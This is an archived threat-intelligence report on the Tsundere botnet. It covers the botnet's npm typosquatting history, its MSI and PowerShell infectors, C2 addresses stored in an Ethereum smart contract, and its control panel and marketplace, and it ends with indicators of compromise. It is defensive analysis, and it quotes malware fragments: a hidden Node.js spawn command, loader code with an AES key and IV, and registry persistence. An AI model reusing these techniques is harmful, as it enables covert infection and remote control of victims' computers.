{
	"id": "a191d082-0c70-4b93-8f1d-68127ef5b61f",
	"created_at": "2026-04-06T00:09:54.69741Z",
	"updated_at": "2026-04-10T03:20:39.255392Z",
	"deleted_at": null,
	"sha1_hash": "9e5ca6adb9428a68f4b9e3a7e53ed64d39016b1a",
	"title": "Blockchain and Node.js abused by Tsundere: an emerging botnet",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1864807,
	"plain_text": "Blockchain and Node.js abused by Tsundere: an emerging botnet\r\nBy Lisandro Ubiedo\r\nPublished: 2025-11-20 · Archived: 2026-04-05 22:46:19 UTC\r\nIntroduction\r\nTsundere is a new botnet, discovered by our Kaspersky GReAT around mid-2025. We have correlated this threat\r\nwith previous reports from October 2024 that reveal code similarities, as well as the use of the same C2 retrieval\r\nmethod and wallet. In that instance, the threat actor created malicious Node.js packages and used the Node\r\nPackage Manager (npm) to deliver the payload. The packages were named similarly to popular packages,\r\nemploying a technique known as typosquatting. The threat actor targeted libraries such as Puppeteer, Bignum.js,\r\nand various cryptocurrency packages, resulting in 287 identified malware packages. This supply chain attack\r\naffected Windows, Linux, and macOS users, but it was short-lived, as the packages were removed and the threat\r\nactor abandoned this infection method after being detected.\r\nThe threat actor resurfaced around July 2025 with a new threat. We have dubbed it the Tsundere bot after its C2\r\npanel. This botnet is currently expanding and poses an active threat to Windows users.\r\nInitial infection\r\nCurrently, there is no conclusive evidence on how the Tsundere bot implants are being spread. However, in one\r\ndocumented case, the implant was installed via a Remote Monitoring and Management (RMM) tool, which\r\ndownloaded a file named pdf.msi from a compromised website. In other instances, the sample names suggest\r\nthat the implants are being disseminated using the lure of popular Windows games, particularly first-person\r\nshooters. The samples found in the wild have names such as “valorant”, “cs2”, or “r6x”, which appear to be\r\nattempts to capitalize on the popularity of these games among piracy communities.\r\nMalware implants\r\nAccording to the C2 panel, there are two distinct formats for spreading the implant: via an MSI installer and via a\r\nPowerShell script. Implants are automatically generated by the C2 panel (as described in the Infrastructure\r\nsection).\r\nMSI installer\r\nThe MSI installer was often disguised as a fake installer for popular games and other software to lure new victims.\r\nNotably, at the time of our research, it had a very low detection rate.\r\nThe installer contains a list of data and JavaScript files that are updated with each new build, as well as the\r\nnecessary Node.js executables to run these scripts. The following is a list of files included in the sample:\r\nhttps://securelist.com/tsundere-node-js-botnet-uses-ethereum-blockchain/117979/\r\nPage 1 of 16\n\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\nnodejs/B4jHWzJnlABB2B7\r\nnodejs/UYE20NBBzyFhqAQ.js\r\nnodejs/79juqlY2mETeQOc\r\nnodejs/thoJahgqObmWWA2\r\nnodejs/node.exe\r\nnodejs/npm.cmd\r\nnodejs/npx.cmd\r\nThe last three files in the list are legitimate Node.js files. They are installed alongside the malicious artifacts in the\r\nuser’s AppData\\Local\\nodejs directory.\r\nAn examination of the CustomAction table reveals the process by which Windows Installer executes the malware\r\nand installs the Tsundere bot:\r\n1\r\nRunModulesSetup 1058    NodeDir powershell -WindowStyle Hidden -NoLogo -enc\r\nJABuAG[...]ACkAOwAiAA==\r\nAfter Base64 decoding, the command appears as follows:\r\n1\r\n2\r\n$nodePath = \"$env:LOCALAPPDATA\\nodejs\\node.exe\";\r\n\u0026 $nodePath  - e \"const { spawn } = require('child_process'); spawn(process.env.LOCALAPPDATA +\r\n'\\\\nodejs\\\\node.exe', ['B4jHWzJnlABB2B7'], { detached: true, stdio: 'ignore', windowsHide: true, cwd:\r\n__dirname }).unref();\"\r\nThis will execute Node.js code that spawns a new Node.js process, which runs the loader JavaScript code (in this\r\ncase, B4jHWzJnlABB2B7 ). The resulting child process runs in the background, remaining hidden from the user.\r\nLoader script\r\nThe loader script is responsible for ensuring the correct decryption and execution of the main bot script, which\r\nhandles npm unpackaging and configuration. Although the loader code, similar to the code for the other JavaScript\r\nfiles, is obfuscated, it can be deobfuscated using open-source tools. Once executed, the loader attempts to locate\r\nthe unpackaging script and configuration for the Tsundere bot, decrypts them using the AES-256 CBC\r\ncryptographic algorithm with a build-specific key and IV, and saves the decrypted files under different filenames.\r\nhttps://securelist.com/tsundere-node-js-botnet-uses-ethereum-blockchain/117979/\r\nPage 2 of 16\n\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\n10\r\n11\r\n12\r\n  encScriptPath = 'thoJahgqObmWWA2',\r\n  encConfigPath = '79juqlY2mETeQOc',\r\n  decScript = 'uB39hFJ6YS8L2Fd',\r\n  decConfig = '9s9IxB5AbDj4Pmw',\r\n  keyBase64 = '2l+jfiPEJufKA1bmMTesfxcBmQwFmmamIGM0b4YfkPQ=',\r\n  ivBase64 = 'NxrqwWI+zQB+XL4+I/042A==',\r\n[...]\r\n    const h = path.dirname(encScriptPath),\r\n      i = path.join(h, decScript),\r\n      j = path.join(h, decConfig)\r\n    decryptFile(encScriptPath, i, key, iv)\r\n    decryptFile(encConfigPath, j, key, iv)\r\nThe configuration file is a JSON that defines a directory and file structure, as well as file contents, which the\r\nmalware will recreate. The malware author refers to this file as “config”, but its primary purpose is to package and\r\ndeploy the Node.js package manager (npm) without requiring manual installation or downloading. The\r\nunpackaging script is responsible for recreating this structure, including the node_modules directory with all its\r\nlibraries, which contains packages necessary for the malware to run.\r\nWith the environment now set up, the malware proceeds to install three packages to the node_modules directory\r\nusing npm:\r\nws : a WebSocket networking library\r\nethers : a library for communicating with Ethereum\r\npm2 : a Node.js process management tool\r\nhttps://securelist.com/tsundere-node-js-botnet-uses-ethereum-blockchain/117979/\r\nPage 3 of 16\n\nLoader script installing the necessary toolset for Tsundere persistence and execution\r\nThe pm2 package is installed to ensure the Tsundere bot remains active and used to launch the bot. Additionally,\r\npm2 helps achieve persistence on the system by writing to the registry and configuring itself to restart the process\r\nupon login.\r\nPowerShell infector\r\nThe PowerShell version of the infector operates in a more compact and simplified manner. Instead of utilizing a\r\nconfiguration file and an unpacker — as done with the MSI installer — it downloads the ZIP file node-v18.17.0-\r\nwin-x64.zip from the official Node.js website nodejs[.]org and extracts it to the AppData\\Local\\NodeJS\r\ndirectory, ultimately deploying Node.js on the targeted device. The infector then uses the AES-256-CBC algorithm\r\nto decrypt two large hexadecimal-encoded variables, which correspond to the bot script and a persistence script.\r\nThese decrypted files, along with a package.json file are written to the disk. The package.json file contains\r\ninformation about the malicious Node.js package, as well as the necessary libraries to be installed, including the\r\nws and ethers packages. Finally, the infector runs both scripts, starting with the persistence script that is\r\nfollowed by the bot script.\r\nThe PowerShell infector creates a package file with the implant dependencies\r\nhttps://securelist.com/tsundere-node-js-botnet-uses-ethereum-blockchain/117979/\r\nPage 4 of 16\n\nPersistence is achieved through the same mechanism observed in the MSI installer: the script creates a value in the\r\nHKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run registry key that points to itself. It then overwrites\r\nitself with a new script that is Base64 decoded. This new script is responsible for ensuring the bot is executed on\r\neach login by spawning a new instance of the bot.\r\nTsundere bot\r\nWe will now delve into the Tsundere bot, examining its communication with the command-and-control (C2)\r\nserver and its primary functionality.\r\nC2 address retrieval\r\nWeb3 contracts, also known as smart contracts, are deployed on a blockchain via transactions from a wallet. These\r\ncontracts can store data in variables, which can be modified by functions defined within the contract. In this case,\r\nthe Tsundere botnet utilizes the Ethereum blockchain, where a method named setString(string _str) is\r\ndefined to modify the state variable param1 , allowing it to store a string. The string stored in param1 is used by\r\nthe Tsundere botnet administrators to store new WebSocket C2 servers, which can be rotated at will and are\r\nimmutable once written to the Ethereum blockchain.\r\nThe Tsundere botnet relies on two constant points of reference on the Ethereum blockchain:\r\nWallet: 0x73625B6cdFECC81A4899D221C732E1f73e504a32\r\nContract: 0xa1b40044EBc2794f207D45143Bd82a1B86156c6b\r\nIn order to change the C2 server, the Tsundere botnet makes a transaction to update the state variable with a new\r\naddress. Below is a transaction made on August 19, 2025, with a value of 0 ETH, which updates the address.\r\nhttps://securelist.com/tsundere-node-js-botnet-uses-ethereum-blockchain/117979/\r\nPage 5 of 16\n\nSmart contract containing the Tsundere botnet WebSocket C2\r\nThe state variable has a fixed length of 32 bytes, and a string of 24 bytes (see item [2] in the previous image) is\r\nstored within it. When this string is converted from hexadecimal to ASCII, it reveals the new WebSocket C2\r\nserver address: ws[:]//185.28.119[.]179:1234 .\r\nTo obtain the C2 address, the bot contacts various public endpoints that provide remote procedure call (RPC)\r\nAPIs, allowing them to interact with Ethereum blockchain nodes. At the start of the script, the bot calls a function\r\nnamed fetchAndUpdateIP , which iterates through a list of RPC providers. For each provider, it checks the\r\ntransactions associated with the contract address and wallet owner, and then retrieves the string from the state\r\nvariable containing the WebSocket address, as previously observed.\r\nhttps://securelist.com/tsundere-node-js-botnet-uses-ethereum-blockchain/117979/\r\nPage 6 of 16\n\nMalware code for retrieval of C2 from the smart contract\r\nThe Tsundere bot verifies that the C2 address starts with either ws:// or wss:// to ensure it is a valid\r\nWebSocket URL, and then sets the obtained string as the server URL. But before using this new URL, the bot first\r\nchecks the system locale by retrieving the culture name of the machine to avoid infecting systems in the CIS\r\nregion. If the system is not in the CIS region, the bot establishes a connection to the server via a WebSocket,\r\nsetting up the necessary handlers for receiving, sending, and managing connection states, such as errors and closed\r\nsockets.\r\nhttps://securelist.com/tsundere-node-js-botnet-uses-ethereum-blockchain/117979/\r\nPage 7 of 16\n\nBot handlers for communication\r\nCommunication\r\nThe communication flow between the client (Tsundere bot) and the server (WebSocket C2) is as follows:\r\n1. 1 The Tsundere bot establishes a WebSocket connection with the retrieved C2 address.\r\n2. 2 An AES key is transmitted immediately after the connection is established.\r\n3. 3 The bot sends an empty string to confirm receipt of the key.\r\n4. 4 The server then sends an IV, enabling the use of encrypted communication from that point on.\r\nEncryption is required for all subsequent communication.\r\n5. 5 The bot transmits the OS information of the infected machine, including the MAC address, total memory,\r\nGPU information, and other details. This information is also used to generate a unique identifier (UUID).\r\n6. 6 The C2 server responds with a JSON object, acknowledging the connection and confirming the bot’s\r\npresence.\r\n7. 7 With the connection established, the client and server can exchange information freely.\r\n1. 7.1 To maintain the connection, keep-alive messages are sent every minute using ping/pong\r\nmessages.\r\n2. 7.2 The bot sends encrypted responses as part of the ping/pong messages, ensuring continuous\r\ncommunication.\r\nhttps://securelist.com/tsundere-node-js-botnet-uses-ethereum-blockchain/117979/\r\nPage 8 of 16\n\nhttps://securelist.com/tsundere-node-js-botnet-uses-ethereum-blockchain/117979/\r\nPage 9 of 16\n\nTsundere communication process with the C2 via WebSockets\r\nThe connections are not authenticated through any additional means, making it possible for a fake client to\r\nestablish a connection.\r\nAs previously mentioned, the client sends an encrypted ping message to the C2 server every minute, which returns\r\na pong message. This ping-pong exchange serves as a mechanism for the C2 panel to maintain a list of currently\r\nactive bots.\r\nFunctionality\r\nThe Tsundere bot is designed to allow the C2 server to send dynamic JavaScript code. When the C2 server sends a\r\nmessage with ID=1 to the bot, the message is evaluated as a new function and then executed. The result of this\r\noperation is sent back to the server via a custom function named serverSend , which is responsible for\r\ntransmitting the result as a JSON object, encrypted for secure communication.\r\nhttps://securelist.com/tsundere-node-js-botnet-uses-ethereum-blockchain/117979/\r\nPage 10 of 16\n\nTsundere bot evaluation code once functions are received from the C2\r\nThe ability to evaluate code makes the Tsundere bot relatively simple, but it also provides flexibility and\r\ndynamism, allowing the botnet administrators to adapt it to a wide range of actions.\r\nHowever, during our observation period, we did not receive any commands or functions from the C2 server,\r\npossibly because the newly connected bot needed to be requested by other threat actors through the botnet panel\r\nbefore it could be utilized.\r\nInfrastructure\r\nThe Tsundere bot utilizes WebSocket as its primary protocol for establishing connections with the C2 server. As\r\nmentioned earlier, at the time of writing, the malware was communicating with the WebSocket server located at\r\n185.28.119[.]179 , and our tests indicated that it was responding positively to bot connections.\r\nThe following table lists the IP addresses and ports extracted from the provided list of URLs:\r\nIP Port First seen (contract update) ASN\r\n185.28.119[.]179 1234 2025-08-19 AS62005\r\n196.251.72[.]192 1234 2025-08-03 AS401120\r\n103.246.145[.]201 1234 2025-07-14 AS211381\r\n193.24.123[.]68 3011 2025-06-21 AS200593\r\n62.60.226[.]179 3001 2025-05-04 AS214351\r\nMarketplace and control panel\r\nNo business is complete without a marketplace, and similarly, no botnet is complete without a control panel. The\r\nTsundere botnet has both a marketplace and a control panel, which are integrated into the same frontend.\r\nhttps://securelist.com/tsundere-node-js-botnet-uses-ethereum-blockchain/117979/\r\nPage 11 of 16\n\nTsundere botnet panel login\r\nThe notable aspect of Tsundere’s control panel, dubbed “Tsundere Netto” (version 2.4.4), is that it has an open\r\nregistration system. Any user who accesses the login form can register and gain access to the panel, which features\r\nvarious tabs:\r\nBots: a dashboard displaying the number of bots under the user’s control\r\nSettings: user settings and administrative functions\r\nBuild: if the user has an active license, they can create new bots using the two previously mentioned\r\nmethodologies (MSI or PowerShell)\r\nMarket: this is the most interesting aspect of the panel, as it allows users to promote their individual bots\r\nand offer various services and functionalities to other threat actors. Each build can create a bot that\r\nperforms a specific set of actions, which can then be offered to others\r\nMonero wallet: a wallet service that enables users to make deposits or withdrawals\r\nSocks proxy: a feature that allows users to utilize their bots as proxies for their traffic\r\nhttps://securelist.com/tsundere-node-js-botnet-uses-ethereum-blockchain/117979/\r\nPage 12 of 16\n\nTsundere botnet control panel, building system and market\r\nEach build generates a unique build ID, which is embedded in the implant and sent to the C2 server upon\r\ninfection. This build ID can be linked to the user who created it. According to our research and analysis of other\r\nURLs found in the wild, builds are created through the panel and can be downloaded via the URL:\r\n1 hxxps://idk.1f2e[REDACTED]07a4[.]net/api/builds/{BUILD-ID}.msi.\r\nAt the time of writing this, the panel typically has between 90 and 115 bots connected to the C2 server at any\r\ngiven time.\r\nAttribution\r\nBased on the text found in the implants, we can conclude with high confidence that the threat actor behind the\r\nTsundere botnet is likely Russian-speaking. The use of the Russian language in the implants is consistent with\r\nprevious attacks attributed to the same threat actor.\r\nhttps://securelist.com/tsundere-node-js-botnet-uses-ethereum-blockchain/117979/\r\nPage 13 of 16\n\nRussian being used throughout the code\r\nFurthermore, our analysis suggests a connection between the Tsundere botnet and the 123 Stealer, a C++-based\r\nstealer available on the shadow market for $120 per month. This connection is based on the fact that both panels\r\nshare the same server. Notably, the main domain serves as the frontend for the 123 Stealer panel, while the\r\nsubdomain “idk.” is used for the Tsundere botnet panel.\r\n123 Stealer C2 panel sharing Tsundere’s infrastructure and showcasing its author\r\nBy examining the available evidence, we can link both threats to a Russian-speaking threat actor known as\r\n“koneko”. Koneko was previously active on a dark web forum, where they promoted the 123 Stealer, as well as\r\nother malware, including a backdoor. Although our analysis of the backdoor revealed that it was not directly\r\nrelated to Tsundere, it shared similarities with the Tsundere botnet in that it was written in Node.js and used\r\nhttps://securelist.com/tsundere-node-js-botnet-uses-ethereum-blockchain/117979/\r\nPage 14 of 16\n\nPowerShell or MSI as infectors. Before the dark web forum was seized and shut down, koneko’s profile featured\r\nthe title “node malware senior”, further suggesting their expertise in Node.js-based malware.\r\nConclusion\r\nThe Tsundere botnet represents a renewed effort by a presumably identified threat actor to revamp their toolset.\r\nThe Node.js-based bot is an evolution of an attack discovered in October of last year, and it now features a new\r\nstrategy and even a new business model. Infections can occur through MSI and PowerShell files, which provides\r\nflexibility in terms of disguising installers, using phishing as a point of entry, or integrating with other attack\r\nmechanisms, making it an even more formidable threat.\r\nAdditionally, the botnet leverages a technique that is gaining popularity: utilizing web3 contracts, also known as\r\n“smart contracts”, to host command-and-control (C2) addresses, which enhances the resilience of the botnet\r\ninfrastructure. The botnet’s possible author, koneko, is also involved in peddling other threats, such as the 123\r\nStealer, which suggests that the threat is likely to escalate rather than diminish in the coming months. As a result,\r\nit is essential to closely monitor this threat and be vigilant for related threats that may emerge in the near future.\r\nIndicators of compromise\r\nMore IoCs related to this threat are available to customers of the Kaspersky Intelligence Reporting Service.\r\nContact: intelreports@kaspersky.com.\r\nFile hashes\r\n235A93C7A4B79135E4D3C220F9313421\r\n760B026EDFE2546798CDC136D0A33834\r\n7E70530BE2BFFCFADEC74DE6DC282357\r\n5CC5381A1B4AC275D221ECC57B85F7C3\r\nAD885646DAEE05159902F32499713008\r\nA7ED440BB7114FAD21ABFA2D4E3790A0\r\n7CF2FD60B6368FBAC5517787AB798EA2\r\nE64527A9FF2CAF0C2D90E2238262B59A\r\n31231FD3F3A88A27B37EC9A23E92EBBC\r\nFFBDE4340FC156089F968A3BD5AA7A57\r\nE7AF0705BA1EE2B6FBF5E619C3B2747E\r\nBFD7642671A5788722D74D62D8647DF9\r\n8D504BA5A434F392CC05EBE0ED42B586\r\n87CE512032A5D1422399566ECE5E24CF\r\nB06845C9586DCC27EDBE387EAAE8853F\r\nDB06453806DACAFDC7135F3B0DEA4A8F\r\nFile paths\r\n%APPDATA%\\Local\\NodeJS\r\nhttps://securelist.com/tsundere-node-js-botnet-uses-ethereum-blockchain/117979/\r\nPage 15 of 16\n\nDomains and IPs\r\nws://185.28.119[.]179:1234\r\nws://196.251.72[.]192:1234\r\nws://103.246.145[.]201:1234\r\nws://193.24.123[.]68:3011\r\nws://62.60.226[.]179:3001\r\nCryptocurrency wallets\r\nNote: These are wallets that have changed the C2 address in the smart contract since it was created.\r\n0x73625B6cdFECC81A4899D221C732E1f73e504a32\r\n0x10ca9bE67D03917e9938a7c28601663B191E4413\r\n0xEc99D2C797Db6E0eBD664128EfED9265fBE54579\r\n0xf11Cb0578EA61e2EDB8a4a12c02E3eF26E80fc36\r\n0xdb8e8B0ef3ea1105A6D84b27Fc0bAA9845C66FD7\r\n0x10ca9bE67D03917e9938a7c28601663B191E4413\r\n0x52221c293a21D8CA7AFD01Ac6bFAC7175D590A84\r\n0x46b0f9bA6F1fb89eb80347c92c9e91BDF1b9E8CC\r\nSource: https://securelist.com/tsundere-node-js-botnet-uses-ethereum-blockchain/117979/\r\nhttps://securelist.com/tsundere-node-js-botnet-uses-ethereum-blockchain/117979/\r\nPage 16 of 16",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://securelist.com/tsundere-node-js-botnet-uses-ethereum-blockchain/117979/"
	],
	"report_names": [
		"117979"
	],
	"threat_actors": [],
	"ts_created_at": 1775434194,
	"ts_updated_at": 1775791239,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/9e5ca6adb9428a68f4b9e3a7e53ed64d39016b1a.pdf",
		"text": "https://archive.orkl.eu/9e5ca6adb9428a68f4b9e3a7e53ed64d39016b1a.txt",
		"img": "https://archive.orkl.eu/9e5ca6adb9428a68f4b9e3a7e53ed64d39016b1a.jpg"
	}
}